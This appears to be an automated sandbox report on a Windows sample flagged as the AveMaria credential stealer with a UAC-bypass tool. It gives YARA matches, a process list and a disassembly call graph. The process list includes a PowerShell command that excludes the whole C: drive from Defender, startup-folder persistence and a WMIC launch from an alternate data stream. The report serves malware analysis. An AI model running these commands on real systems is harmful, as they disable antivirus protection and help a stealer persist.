                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 24%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:33:22
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                  Imagebase:0x1c0000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:7
                                                                  Start time:12:33:24
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                                                                  Imagebase:0x7ff737520000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\cmd.exe
                                                                  Imagebase:0xc20000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:9
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:10
                                                                  Start time:12:33:25
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:12
                                                                  Start time:12:33:26
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:13
                                                                  Start time:12:33:26
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                                                                  Imagebase:0x7ff7431c0000
                                                                  File size:521728 bytes
                                                                  MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:22
                                                                  Start time:12:33:44
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:30616 bytes
                                                                  MD5 hash:0600DF60EF88FD10663EC84709E5E245
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:23
                                                                  Start time:12:33:44
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:182784 bytes
                                                                  MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:27
                                                                  Start time:12:33:45
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:126464 bytes
                                                                  MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:30
                                                                  Start time:12:34:06
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff674600000
                                                                  File size:488448 bytes
                                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:41
                                                                  Start time:12:35:04
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff674600000
                                                                  File size:488448 bytes
                                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:5.9%
                                                                    Dynamic/Decrypted Code Coverage:61.1%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:1852
                                                                    Total number of Limit Nodes:22
                                                                    execution_graph 19443 2d22c91 19444 2d22c9c 19443->19444 19445 2d22cfc CoUninitialize 19444->19445 19446 407c24 19451 407f52 SetUnhandledExceptionFilter 19446->19451 19448 407c29 19452 40d26f 19448->19452 19450 407c34 19451->19448 19453 40d295 19452->19453 19454 40d27b 19452->19454 19453->19450 19454->19453 19459 40aa25 19454->19459 19465 40dbea GetLastError 19459->19465 19462 40a968 19688 40a8ed 19462->19688 19464 40a974 19464->19450 19466 40dc03 19465->19466 19467 40dc09 19465->19467 19491 40e0f1 19466->19491 19490 40dc0f 19467->19490 19496 40e147 19467->19496 19470 40dc30 19471 40dc14 SetLastError 19470->19471 19501 40dce3 19470->19501 19473 40aa2a 19471->19473 19473->19462 19475 40dc94 SetLastError 19475->19473 19476 40dc48 19478 40e147 _unexpected 6 API calls 19476->19478 19477 40dc5d 19479 40e147 _unexpected 6 API calls 19477->19479 19480 40dc54 19478->19480 19481 40dc69 19479->19481 19508 40dd40 19480->19508 19482 40dc7c 19481->19482 19483 40dc6d 19481->19483 19514 40d8c6 19482->19514 19484 40e147 _unexpected 6 API calls 19483->19484 19484->19480 19488 40dc5a 19488->19471 19489 40dd40 _free 12 API calls 19489->19490 19490->19471 19490->19475 19519 40df6b 19491->19519 19493 40e118 19494 40e130 TlsGetValue 19493->19494 19495 40e124 CatchGuardHandler 19493->19495 19494->19495 19495->19467 19497 40df6b _unexpected 5 API calls 19496->19497 19498 40e16e 19497->19498 19499 40e189 TlsSetValue 19498->19499 19500 40e17d CatchGuardHandler 19498->19500 19499->19500 19500->19470 19506 40dcf0 _unexpected 19501->19506 19502 40dd30 19505 40aa25 __dosmaperr 14 API calls 19502->19505 19503 40dd1b RtlAllocateHeap 19504 40dc40 19503->19504 19503->19506 19504->19476 19504->19477 19505->19504 19506->19502 19506->19503 19532 40d2b3 19506->19532 19509 40dd4b HeapFree 19508->19509 19513 40dd74 __dosmaperr 19508->19513 19510 40dd60 19509->19510 19509->19513 19511 40aa25 __dosmaperr 13 API calls 19510->19511 19512 40dd66 GetLastError 19511->19512 19512->19513 19513->19488 19546 40d782 19514->19546 19516 40d934 19552 40d876 19516->19552 19518 40d95d 19518->19489 19520 40df98 19519->19520 19524 40df94 _unexpected 19519->19524 19520->19524 19525 40dea3 19520->19525 19523 40dfb2 GetProcAddress 19523->19524 19524->19493 19530 40deb4 ___vcrt_FlsGetValue 19525->19530 19526 40ded1 LoadLibraryExW 19528 40deec GetLastError 19526->19528 19526->19530 19527 40df5e 19527->19523 19527->19524 19528->19530 19529 40df47 FreeLibrary 19529->19530 19530->19526 19530->19527 19530->19529 19531 40df1f LoadLibraryExW 19530->19531 19531->19530 19535 40d2f7 19532->19535 19534 40d2c9 CatchGuardHandler 19534->19506 19536 40d303 __FrameHandler3::FrameUnwindToState 19535->19536 19541 40faaa RtlEnterCriticalSection 19536->19541 19538 40d30e 19542 40d340 19538->19542 19540 40d335 __FrameHandler3::FrameUnwindToState 19540->19534 19541->19538 19545 40faf2 RtlLeaveCriticalSection 19542->19545 19544 40d347 19544->19540 19545->19544 19547 40d78e __FrameHandler3::FrameUnwindToState 19546->19547 19560 40faaa RtlEnterCriticalSection 19547->19560 19549 40d798 19561 40d7be 19549->19561 19551 40d7b6 __FrameHandler3::FrameUnwindToState 19551->19516 19553 40d882 __FrameHandler3::FrameUnwindToState 19552->19553 19565 40faaa RtlEnterCriticalSection 19553->19565 19555 40d88c 19566 40da51 19555->19566 19557 40d8a4 19570 40d8ba 19557->19570 19559 40d8b2 __FrameHandler3::FrameUnwindToState 19559->19518 19560->19549 19564 40faf2 RtlLeaveCriticalSection 19561->19564 19563 40d7c8 19563->19551 19564->19563 19565->19555 19567 40da87 _unexpected 19566->19567 19568 40da60 _unexpected 19566->19568 19567->19557 19568->19567 19573 411669 19568->19573 19687 40faf2 RtlLeaveCriticalSection 19570->19687 19572 40d8c4 19572->19559 19575 4116e9 19573->19575 19576 41167f 19573->19576 19577 40dd40 _free 15 API calls 19575->19577 19599 411737 19575->19599 19576->19575 19579 4116b2 19576->19579 19582 40dd40 _free 15 API calls 19576->19582 19578 41170b 19577->19578 19580 40dd40 _free 15 API calls 19578->19580 19587 40dd40 _free 15 API calls 19579->19587 19598 4116d4 19579->19598 19583 41171e 19580->19583 19581 40dd40 _free 15 API calls 19584 4116de 19581->19584 19586 4116a7 19582->19586 19588 40dd40 _free 15 API calls 19583->19588 19589 40dd40 _free 15 API calls 19584->19589 19585 4117a5 19590 40dd40 _free 15 API calls 19585->19590 19601 411245 19586->19601 19592 4116c9 19587->19592 19593 41172c 19588->19593 19589->19575 19596 4117ab 19590->19596 19629 411343 19592->19629 19595 40dd40 _free 15 API calls 19593->19595 19595->19599 19596->19567 19597 411745 19597->19585 19600 40dd40 15 API calls _free 19597->19600 19598->19581 19641 4117dc 19599->19641 19600->19597 19602 411256 19601->19602 19628 41133f 19601->19628 19603 411267 19602->19603 19604 40dd40 _free 15 API calls 19602->19604 19605 411279 19603->19605 19607 40dd40 _free 15 API calls 19603->19607 19604->19603 19606 41128b 19605->19606 19608 40dd40 _free 15 API calls 19605->19608 19609 41129d 19606->19609 19610 40dd40 _free 15 API calls 19606->19610 19607->19605 19608->19606 19611 4112af 19609->19611 19612 40dd40 _free 15 API calls 19609->19612 19610->19609 19613 4112c1 19611->19613 19615 40dd40 _free 15 API calls 19611->19615 19612->19611 19614 4112d3 19613->19614 19616 40dd40 _free 15 API calls 19613->19616 19617 4112e5 19614->19617 19618 40dd40 _free 15 API calls 19614->19618 19615->19613 19616->19614 19619 4112f7 19617->19619 19620 40dd40 _free 15 API calls 19617->19620 19618->19617 19621 411309 19619->19621 19622 40dd40 _free 15 API calls 19619->19622 19620->19619 19623 40dd40 _free 15 API calls 19621->19623 19624 41131b 19621->19624 19622->19621 19623->19624 19625 41132d 19624->19625 19626 40dd40 _free 15 API calls 19624->19626 19627 40dd40 _free 15 API calls 19625->19627 19625->19628 19626->19625 19627->19628 19628->19579 19631 411350 19629->19631 19640 4113a8 19629->19640 19630 411360 19633 411372 19630->19633 19634 40dd40 _free 15 API calls 19630->19634 19631->19630 19632 40dd40 _free 15 API calls 19631->19632 19632->19630 19635 411384 19633->19635 19636 40dd40 _free 15 API calls 19633->19636 19634->19633 19637 411396 19635->19637 19638 40dd40 _free 15 API calls 19635->19638 19636->19635 19639 40dd40 _free 15 API calls 19637->19639 19637->19640 19638->19637 19639->19640 19640->19598 19642 411807 19641->19642 19643 4117e9 19641->19643 19642->19597 19643->19642 19647 4113e4 19643->19647 19646 40dd40 _free 15 API calls 19646->19642 19648 4114c2 19647->19648 19649 4113f5 19647->19649 19648->19646 19683 4113ac 19649->19683 19652 4113ac _unexpected 15 API calls 19653 411408 19652->19653 19654 4113ac _unexpected 15 API calls 19653->19654 19655 411413 19654->19655 19656 4113ac _unexpected 15 API calls 19655->19656 19657 41141e 19656->19657 19658 4113ac _unexpected 15 API calls 19657->19658 19659 41142c 19658->19659 19660 40dd40 _free 15 API calls 19659->19660 19661 411437 19660->19661 19662 40dd40 _free 15 API calls 19661->19662 19663 411442 19662->19663 19664 40dd40 _free 15 API calls 19663->19664 19665 41144d 19664->19665 19666 4113ac _unexpected 15 API calls 19665->19666 19667 41145b 19666->19667 19668 4113ac _unexpected 15 API calls 19667->19668 19669 411469 19668->19669 19670 4113ac _unexpected 15 API calls 19669->19670 19671 41147a 19670->19671 19672 4113ac _unexpected 15 API calls 19671->19672 19673 411488 19672->19673 19674 4113ac _unexpected 15 API calls 19673->19674 19675 411496 19674->19675 19676 40dd40 _free 15 API calls 19675->19676 19677 4114a1 19676->19677 19678 40dd40 _free 15 API calls 19677->19678 19679 4114ac 19678->19679 19680 40dd40 _free 15 API calls 19679->19680 19681 4114b7 19680->19681 19682 40dd40 _free 15 API calls 19681->19682 19682->19648 19684 4113df 19683->19684 19685 4113cf 19683->19685 19684->19652 19685->19684 19686 40dd40 _free 15 API calls 19685->19686 19686->19685 19687->19572 19689 40dbea __dosmaperr 15 API calls 19688->19689 19690 40a903 19689->19690 19695 40a911 CatchGuardHandler 19690->19695 19696 40a978 IsProcessorFeaturePresent 19690->19696 19692 40a967 19693 40a8ed __cftof 21 API calls 19692->19693 19694 40a974 19693->19694 19694->19464 19695->19464 19697 40a984 19696->19697 19700 40a7a3 19697->19700 19699 40a999 GetCurrentProcess TerminateProcess 19699->19692 19701 40a7bf __cftof __FrameHandler3::FrameUnwindToState 19700->19701 19702 40a7eb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19701->19702 19703 40a8bc CatchGuardHandler __FrameHandler3::FrameUnwindToState 19702->19703 19703->19699 19704 553b50 19705 553b70 19704->19705 19706 553c8a LoadLibraryA 19705->19706 19709 553ccf VirtualProtect VirtualProtect 19705->19709 19707 553ca1 19706->19707 19707->19705 19711 553cb3 GetProcAddress 19707->19711 19710 553d3d 19709->19710 19710->19710 19711->19707 19712 553cc9 ExitProcess 19711->19712 19713 407c36 19714 407c42 __FrameHandler3::FrameUnwindToState 19713->19714 19743 4077cf 19714->19743 19716 407c49 19717 407d9c 19716->19717 19721 407c73 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 19716->19721 19810 407dbf IsProcessorFeaturePresent 19717->19810 19719 407da3 19814 40c579 19719->19814 19725 407c92 19721->19725 19728 407d13 19721->19728 19792 40c541 19721->19792 19754 407eda 19728->19754 19744 4077d8 19743->19744 19824 408024 IsProcessorFeaturePresent 19744->19824 19748 4077e9 19749 4077ed 19748->19749 19834 40cf62 19748->19834 19749->19716 19752 407804 19752->19716 19961 409210 19754->19961 19756 407eed GetStartupInfoW 19757 407d19 19756->19757 19758 40d03e 19757->19758 19963 410517 19758->19963 19760 40d047 19762 407d21 19760->19762 19969 410846 19760->19969 19763 4068b0 19762->19763 20285 406730 GetCommandLineA CoInitialize 19763->20285 19793 40c0a8 _unexpected 19792->19793 19794 40c569 _unexpected 19792->19794 19795 40da9c _unexpected 34 API calls 19793->19795 19794->19728 19798 40c0b9 19795->19798 19796 40d3a8 __FrameHandler3::FrameUnwindToState 34 API calls 19797 40c0e3 19796->19797 19798->19796 19811 407dd5 __cftof __FrameHandler3::FrameUnwindToState 19810->19811 19812 407e80 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19811->19812 19813 407ecb __FrameHandler3::FrameUnwindToState 19812->19813 19813->19719 19815 40c3a8 __FrameHandler3::FrameUnwindToState 24 API calls 19814->19815 19816 407da9 19815->19816 19817 40c52b 19816->19817 19818 40c3a8 __FrameHandler3::FrameUnwindToState 24 API calls 19817->19818 19819 407db1 19818->19819 19820 4082b8 19819->19820 19821 4082ce 19820->19821 19823 407db7 __scrt_common_main_seh 19821->19823 20548 40826b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19821->20548 19825 4077e4 19824->19825 19826 409370 19825->19826 19843 40a497 19826->19843 19829 409379 19829->19748 19831 409381 19832 40938c 19831->19832 19857 40a4d3 19831->19857 19832->19748 19899 41094c 19834->19899 19836 4077f6 19836->19752 19837 40938f 19836->19837 19838 4093a2 19837->19838 19839 409398 19837->19839 19838->19749 19840 409553 ___vcrt_uninitialize_ptd 6 API calls 19839->19840 19841 40939d 19840->19841 19842 40a4d3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 19841->19842 19842->19838 19844 40a4a0 19843->19844 19846 40a4c9 19844->19846 19847 409375 19844->19847 19861 40a6d6 19844->19861 19848 40a4d3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 19846->19848 19847->19829 19849 409520 19847->19849 19848->19847 19880 40a5e7 19849->19880 19854 409550 19854->19831 19856 409535 19856->19831 19858 40a4fd 19857->19858 19859 40a4de 19857->19859 19858->19829 19860 40a4e8 RtlDeleteCriticalSection 19859->19860 19860->19858 19860->19860 19866 40a59d 19861->19866 19864 40a6f9 19864->19844 19865 40a70e InitializeCriticalSectionAndSpinCount 19865->19864 19867 40a5d9 19866->19867 19868 40a5b6 19866->19868 19867->19864 19867->19865 19868->19867 19872 40a502 19868->19872 19871 40a5cb GetProcAddress 19871->19867 19877 40a50e ___vcrt_FlsGetValue 19872->19877 19873 40a583 19873->19867 19873->19871 19874 40a525 LoadLibraryExW 19875 40a543 GetLastError 19874->19875 19876 40a58a 19874->19876 19875->19877 19876->19873 19878 40a592 FreeLibrary 19876->19878 19877->19873 19877->19874 19879 40a565 LoadLibraryExW 19877->19879 19878->19873 19879->19876 19879->19877 19881 40a59d ___vcrt_FlsGetValue 5 API calls 19880->19881 19882 40a601 19881->19882 19883 40a61a TlsAlloc 19882->19883 19884 40952a 19882->19884 19884->19856 19885 40a698 19884->19885 19886 40a59d ___vcrt_FlsGetValue 5 API calls 19885->19886 19887 40a6b2 19886->19887 19888 40a6cd TlsSetValue 19887->19888 19889 409543 19887->19889 19888->19889 19889->19854 19890 409553 19889->19890 19891 409563 19890->19891 19892 40955d 19890->19892 19891->19856 19894 40a622 19892->19894 19895 40a59d ___vcrt_FlsGetValue 5 API calls 19894->19895 19896 40a63c 19895->19896 19897 40a654 TlsFree 19896->19897 19898 40a648 19896->19898 19897->19898 19898->19891 19900 410969 19899->19900 19901 410965 CatchGuardHandler 19899->19901 19900->19901 19903 40f9e7 19900->19903 19901->19836 19904 40f9f3 __FrameHandler3::FrameUnwindToState 19903->19904 19915 40faaa RtlEnterCriticalSection 19904->19915 19906 40f9fa 19916 41104a 19906->19916 19908 40fa09 19909 40fa18 19908->19909 19929 40f87b GetStartupInfoW 19908->19929 19940 40fa34 19909->19940 19914 40fa29 __FrameHandler3::FrameUnwindToState 19914->19900 19915->19906 19917 411056 __FrameHandler3::FrameUnwindToState 19916->19917 19918 411076 19917->19918 19919 41105f 19917->19919 19943 40faaa RtlEnterCriticalSection 19918->19943 19920 40aa25 __dosmaperr 15 API calls 19919->19920 19922 411064 19920->19922 19923 40a968 __cftof 21 API calls 19922->19923 19925 41106e __FrameHandler3::FrameUnwindToState 19923->19925 19924 4110ae 19951 4110d5 19924->19951 19925->19908 19926 411082 19926->19924 19944 410f9b 19926->19944 19930 40f898 19929->19930 19931 40f92c 19929->19931 19930->19931 19932 41104a 22 API calls 19930->19932 19935 40f933 19931->19935 19933 40f8c0 19932->19933 19933->19931 19934 40f8f0 GetFileType 19933->19934 19934->19933 19936 40f93a 19935->19936 19937 40f97d GetStdHandle 19936->19937 19938 40f9e3 19936->19938 19939 40f990 GetFileType 19936->19939 19937->19936 19938->19909 19939->19936 19960 40faf2 RtlLeaveCriticalSection 19940->19960 19942 40fa3b 19942->19914 19943->19926 19945 40dce3 _unexpected 15 API calls 19944->19945 19946 410fad 19945->19946 19950 410fba 19946->19950 19954 40e1a0 19946->19954 19947 40dd40 _free 15 API calls 19949 41100c 19947->19949 19949->19926 19950->19947 19959 40faf2 RtlLeaveCriticalSection 19951->19959 19953 4110dc 19953->19925 19955 40df6b _unexpected 5 API calls 19954->19955 19956 40e1c7 19955->19956 19957 40e1e5 InitializeCriticalSectionAndSpinCount 19956->19957 19958 40e1d0 CatchGuardHandler 19956->19958 19957->19958 19958->19946 19959->19953 19960->19942 19962 409227 19961->19962 19962->19756 19962->19962 19964 410520 19963->19964 19968 410552 19963->19968 19972 40db50 19964->19972 19968->19760 20282 4107ed 19969->20282 19973 40db5b 19972->19973 19976 40db61 19972->19976 19974 40e0f1 _unexpected 6 API calls 19973->19974 19974->19976 19975 40e147 _unexpected 6 API calls 19977 40db7b 19975->19977 19976->19975 19994 40db67 19976->19994 19979 40dce3 _unexpected 15 API calls 19977->19979 19977->19994 19982 40db8b 19979->19982 19980 40dbe0 19997 410369 19980->19997 19983 40db93 19982->19983 19984 40dba8 19982->19984 19985 40e147 _unexpected 6 API calls 19983->19985 19986 40e147 _unexpected 6 API calls 19984->19986 19987 40db9f 19985->19987 19988 40dbb4 19986->19988 19991 40dd40 _free 15 API calls 19987->19991 19989 40dbc7 19988->19989 19990 40dbb8 19988->19990 19993 40d8c6 _unexpected 15 API calls 19989->19993 19992 40e147 _unexpected 6 API calls 19990->19992 19991->19994 19992->19987 19995 40dbd2 19993->19995 19994->19980 20015 40d3a8 19994->20015 19996 40dd40 _free 15 API calls 19995->19996 19996->19994 20102 410484 19997->20102 19999 41037c 20109 4100fd 19999->20109 20002 410395 20002->19968 20005 4103d8 20007 40dd40 _free 15 API calls 20005->20007 20007->20002 20008 4103cb 20009 4103d3 20008->20009 20012 4103f0 20008->20012 20010 40aa25 __dosmaperr 15 API calls 20009->20010 20010->20005 20011 41041c 20011->20005 20132 40fff9 20011->20132 20012->20011 20013 40dd40 _free 15 API calls 20012->20013 20013->20011 20026 410adb 20015->20026 20018 40d3b8 20020 40d3c2 IsProcessorFeaturePresent 20018->20020 20025 40d3e1 20018->20025 20021 40d3ce 20020->20021 20024 40a7a3 __FrameHandler3::FrameUnwindToState 3 API calls 20021->20024 20022 40c52b __FrameHandler3::FrameUnwindToState 24 API calls 20023 40d3eb 20022->20023 20024->20025 20025->20022 20054 410a17 20026->20054 20028 40d3ad 20028->20018 20029 410b2b 20028->20029 20030 410b37 _unexpected 20029->20030 20031 40dbea __dosmaperr 15 API calls 20030->20031 20034 410b64 __FrameHandler3::FrameUnwindToState 20030->20034 20036 410b5e __FrameHandler3::FrameUnwindToState 20030->20036 20031->20036 20032 410ba9 20033 40aa25 __dosmaperr 15 API calls 20032->20033 20035 410bae 20033->20035 20040 410bd5 20034->20040 20065 40faaa RtlEnterCriticalSection 20034->20065 20037 40a968 __cftof 21 API calls 20035->20037 20036->20032 20036->20034 20039 410b93 __FrameHandler3::FrameUnwindToState 20036->20039 20037->20039 20039->20018 20042 410c2f 20040->20042 20047 410c27 20040->20047 20051 410c5a 20040->20051 20066 40faf2 RtlLeaveCriticalSection 20040->20066 20042->20051 20067 410b22 20042->20067 20043 40c52b __FrameHandler3::FrameUnwindToState 24 API calls 20043->20042 20047->20043 20050 410b22 __FrameHandler3::FrameUnwindToState 34 API calls 20050->20051 20070 410cd9 20051->20070 20052 410cbd 20052->20039 20053 40da9c _unexpected 34 API calls 20052->20053 20053->20039 20055 410a23 __FrameHandler3::FrameUnwindToState 20054->20055 20060 40faaa RtlEnterCriticalSection 20055->20060 20057 410a31 20061 410a65 20057->20061 20059 410a58 __FrameHandler3::FrameUnwindToState 20059->20028 20060->20057 20064 40faf2 RtlLeaveCriticalSection 20061->20064 20063 410a6f 20063->20059 20064->20063 20065->20040 20066->20047 20068 40da9c _unexpected 34 API calls 20067->20068 20069 410b27 20068->20069 20069->20050 20071 410cae 20070->20071 20072 410cdf 20070->20072 20071->20039 20071->20052 20074 40da9c GetLastError 20071->20074 20101 40faf2 RtlLeaveCriticalSection 20072->20101 20075 40dab2 20074->20075 20076 40dab8 20074->20076 20078 40e0f1 _unexpected 6 API calls 20075->20078 20077 40e147 _unexpected 6 API calls 20076->20077 20100 40dabe 